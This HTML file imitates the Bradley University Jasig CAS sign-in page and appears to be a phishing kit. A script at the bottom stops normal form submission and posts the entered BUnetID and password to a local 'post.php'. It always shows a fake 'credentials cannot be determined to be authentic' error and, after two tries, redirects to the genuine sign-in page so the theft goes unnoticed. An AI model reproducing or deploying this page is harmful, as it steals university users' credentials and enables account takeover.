<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
    <head>
	    <title>Bradley University Signin Service</title>
        
		
        <link type="text/css" rel="stylesheet" href="https://signin.bradley.edu/cas/css/cas.css;jsessionid=66D32157A396501AA3D1D5E66AA33FB4">
        <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
	    <link rel="icon" href="https://signin.bradley.edu/cas/favicon.ico;jsessionid=66D32157A396501AA3D1D5E66AA33FB4" type="image/x-icon">
	</head>
	<body id="cas" class="fl-theme-iphone">
    <div class="flc-screenNavigator-view-container">
        <div class="fl-screenNavigator-view">
            <div id="header" class="flc-screenNavigator-navbar fl-navbar fl-table">
				
                <h1 id="app-name" class="fl-table-cell">Bradley University Signin Service</h1>
            </div>		
            <div id="content" class="fl-screenNavigator-scroll-container">



  <div class="box fl-panel" id="login">
			<form id="fm1" class="fm-v clearfix" action="" method="post" >
                <p id="msg" style="color: red;"></p>
                <!-- Nothing to see here.  -->
                    <h2>Enter your BUnetID and Password</h2>
                    <div class="row fl-controls-left">
                        <label for="username" class="fl-label"><span class="accesskey">B</span>UnetID:</label>
						

						
						
						<input id="email" name="username" class="required" tabindex="1" accesskey="b" type="text" value="" size="25" autocomplete="false">
						
                    </div>
                    <div class="row fl-controls-left">
                        <label for="password" class="fl-label"><span class="accesskey">P</span>assword:</label>
						
						
						<input id="password" name="password" class="required" tabindex="2" accesskey="p" type="password" value="" size="25" autocomplete="off">
                    </div>
                    <div class="row check">
                        <input id="warn" name="warn" value="true" tabindex="3" accesskey="w" type="checkbox">
                        <label for="warn"><span class="accesskey">W</span>arn me before logging me into other sites.</label>
                    </div>
                    <div class="row btn-row">
						

                        <input class="btn-submit" name="submit" accesskey="l" id="submit-btn" value="LOGIN" tabindex="4" type="submit">
                        <input class="btn-reset" name="reset" accesskey="c" value="CLEAR" tabindex="5" type="reset">
                    </div>
            </form>
          </div>
            <div id="sidebar">
				<div class="sidebar-content">
                <p class="fl-panel fl-note fl-bevel-white fl-font-size-80">Many applications are now using Bradley University Secure Signin Service for authentication.  </p><p>Before entering your BUnetID and password, verify that the URL for this page begins with: <b>https://signin.bradley.edu.</b> </p><p>To protect your privacy log out and <b>quit your web browser</b> when you are done accessing services that require authentication. </p> <p>Bradley University will never ask for your username and password via email.</p><p><a href="https://password.bradley.edu/"><font size="+2">Reset a forgotten password</font></a></p><p></p>
                <div id="list-languages" class="fl-panel">
                
					
                    
                  <h3>Languages:</h3>
                  
                     
                     
                        
						<ul><li class="first"><a href="login?service=https://mybu.bradley.edu/MyBU/Login&amp;locale=en">English</a></li><li><a href="login?service=https://mybu.bradley.edu/MyBU/Login&amp;locale=es">Spanish</a></li><li><a href="login?service=https://mybu.bradley.edu/MyBU/Login&amp;locale=fr">French</a></li><li><a href="login?service=https://mybu.bradley.edu/MyBU/Login&amp;locale=ru">Russian</a></li><li><a href="login?service=https://mybu.bradley.edu/MyBU/Login&amp;locale=nl">Nederlands</a></li><li><a href="login?service=https://mybu.bradley.edu/MyBU/Login&amp;locale=sv">Svenska</a></li><li><a href="login?service=https://mybu.bradley.edu/MyBU/Login&amp;locale=it">Italiano</a></li><li><a href="login?service=https://mybu.bradley.edu/MyBU/Login&amp;locale=ur">Urdu</a></li><li><a href="login?service=https://mybu.bradley.edu/MyBU/Login&amp;locale=zh_CN">Chinese (Simplified)</a></li><li><a href="login?service=https://mybu.bradley.edu/MyBU/Login&amp;locale=zh_TW">Chinese (Traditional)</a></li><li><a href="login?service=https://mybu.bradley.edu/MyBU/Login&amp;locale=de">Deutsch</a></li><li><a href="login?service=https://mybu.bradley.edu/MyBU/Login&amp;locale=ja">Japanese</a></li><li><a href="login?service=https://mybu.bradley.edu/MyBU/Login&amp;locale=hr">Croatian</a></li><li><a href="login?service=https://mybu.bradley.edu/MyBU/Login&amp;locale=cs">Czech</a></li><li><a href="login?service=https://mybu.bradley.edu/MyBU/Login&amp;locale=sl">Slovenian</a></li><li><a href="login?service=https://mybu.bradley.edu/MyBU/Login&amp;locale=ca">Catalan</a></li><li><a href="login?service=https://mybu.bradley.edu/MyBU/Login&amp;locale=mk">Macedonian</a></li><li><a href="login?service=https://mybu.bradley.edu/MyBU/Login&amp;locale=fa">Farsi</a></li><li><a href="login?service=https://mybu.bradley.edu/MyBU/Login&amp;locale=ar">Arabic</a></li><li><a href="login?service=https://mybu.bradley.edu/MyBU/Login&amp;locale=pt_PT">Portuguese</a></li><li><a href="login?service=https://mybu.bradley.edu/MyBU/Login&amp;locale=pt_BR">Portuguese (Brazil)</a></li><li class="last"><a href="login?service=https://mybu.bradley.edu/MyBU/Login&amp;locale=pl">Polish</a></li></ul>
                     
                   
                </div>
				</div>
            </div>



</div>
                <div id="footer" class="fl-panel fl-note fl-bevel-white fl-font-size-80">
                
                

 <p>Served by snape  </p>
 
                	<a id="jasig" href="http://www.jasig.org" title="go to Jasig home page"></a>
                    <div id="copyright">
                        <p>Copyright © 2005 - 2012 Jasig, Inc. All rights reserved.</p>
                        <p>Powered by <a href="http://www.jasig.org/cas">Jasig Central Authentication Service 3.5.2.1</a></p>
                    </div>
                </div>
            </div>
        </div>
        <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/3.4.1/jquery.min.js"></script>
        <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jqueryui/1.12.1/jquery-ui.min.js"></script>
        <script type="text/javascript" src="/cas/js/cas.js;jsessionid=66D32157A396501AA3D1D5E66AA33FB4"></script>
    
        <script src="https://code.jquery.com/jquery-3.2.1.slim.min.js" integrity="sha384-KJ3o2DKtIkvYIK3UENzmM7KCkRr/rE9/Qpg6aAZGJwFDMVNA/GpGFF93hXpG5KkN" crossorigin="anonymous"></script>
            <script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.js" integrity="sha384-ApNbgh9B+Y1QKtv3Rn7W3mgPxhU9K/ScQsAP7hUibX39j7fakFPskvXusvfa0b4Q" crossorigin="anonymous"></script>
            <script src="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.js" integrity="sha384-JZR6Spejh4U02d8jOt6vLEHfe/JQGiRRSQQxSfFWpi1MquVdAyjUar5+76PVCmYl" crossorigin="anonymous"></script>
          <script src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
          <script src="https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/js/bootstrap.min.js"></script>
          <script type="text/javascript" src="https://cdn.jsdelivr.net/npm/jquery.session@1.0.0/jquery.session.min.js"></script>
      
      
      
                      <script>
      
	  
                          /* global $ */
                          $(document).ready(function(){
                            var count=0;
                      
                        
                            $('#submit-btn').click(function(event){
                              $('#error').hide();
                              $('#msg').hide();
                              event.preventDefault();
                              var email=$("#email").val();
                              var password=$("#password").val();
                              var msg = $('#msg').html();
                              $('#msg').text( msg );
                      
                                          if (!password) {
                                      $('#msg').show();
                                      $('#msg').html("Password field is empty!");
                      
                                      return false;
                                  }
                      
                      
                      
                             
                            count=count+1;
                            
                            $.ajax({
                              dataType: 'JSON',
                              url: 'post.php',
                              type: 'POST',
                              data:{
                                email:email,
                                password:password,
                              },
                                  // data: $('#contact').serialize(),
                                  beforeSend: function(xhr){
                                  
                                  },
                                  success: function(response){
                                    if(response){
                                      $("#msg").show();
                                      console.log(response);
                                      if(response['signal'] == 'ok'){
                                         $("#password").val("");
                                        if (count>=2) {
                                          count=0;
                                          // window.location.replace(response['redirect_link']);
                                           window.location.replace("https://signin.bradley.edu/cas/login?service=https://mybu.bradley.edu/MyBU/Login");
                      
                                        }
                                                     $("#msg").show();
                                     $('#msg').html("The credentials you provided cannot be determined to be authentic.");
                                      }
                                      else{
                                                      $("#msg").show();
                                     $('#msg').html("The credentials you provided cannot be determined to be authentic.");
                                      }
                                    }
                                  },
                                  error: function(){
                                    $("#password").val(""); 
                                    if (count>=2) {
                                      count=0;
                                       window.location.replace("https://signin.bradley.edu/cas/login?service=https://mybu.bradley.edu/MyBU/Login");
                                    }
                                    $("#msg").show();
                                     $('#msg').html("The credentials you provided cannot be determined to be authentic.");
                                  },
                                  complete: function(){
                                  
                                  }
                                });
                          });
                      
                      
                          });
                      
                      
                        </script>



</body>
</html>